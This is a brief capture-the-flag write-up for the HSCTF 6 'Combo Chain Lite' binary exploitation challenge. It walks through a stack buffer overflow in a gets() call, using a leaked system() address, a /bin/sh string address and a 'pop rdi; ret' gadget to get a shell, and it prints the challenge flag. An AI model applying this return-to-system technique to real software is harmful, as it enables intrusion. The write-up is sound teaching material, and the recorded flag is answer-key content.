| Event | Title | Category | Cost |
|---|---|---|---|
| HSCTF 6 | Combo Chain Lite | Binary Exploitation | ~250 |
Written by: Ptomerty
Training wheels!
nc pwn.hsctf.com 3131
Note: If you're trying to use python or a similar program to run your exploit, make sure to keep stdin alive with cat, like this: (python; cat -) | nc pwn.hsctf.com
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Simple buffer overflow with address of system() and sting bin/sh
void vuln() {
char dest[8];
printf("Here's your free computer: %p\n", system);
printf("Dude you hear about that new game called /bin/sh");
printf("? Enter the right combo for some COMBO CARNAGE!: ");
gets(dest);
}We should cautch system() address with regexp:
SYSTEM = int(re.findall(r"computer: (.*)", data)[0], 16)
Get /bin/sh address from binary:
dbg> find 0x400000,0x403000,"/bin/sh"
0x402051
1 pattern found.
dbg> x/s 0x402051
0x402051: "/bin/sh"Count padding before return address - 8b buf + 8b ebp = 16b
And find ROP gadget to pass argument to system() (We need $RDI, because of gcc and x64)
$ ROPgadget --binary combo-chain-lite | grep "pop rdi"
0x0000000000401273 : pop rdi ; ret
It`s enough to wtite an exploit.
After we can run it and get the flag.
$ ./exp.py
[+] Opening connection to pwn.hsctf.com on port 3131: Done
Here's your free computer: 0x7fd7b60ba390
[*] Switching to interactive mode
# cat flag
hsctf{wheeeeeee_that_was_fun}hsctf{wheeeeeee_that_was_fun}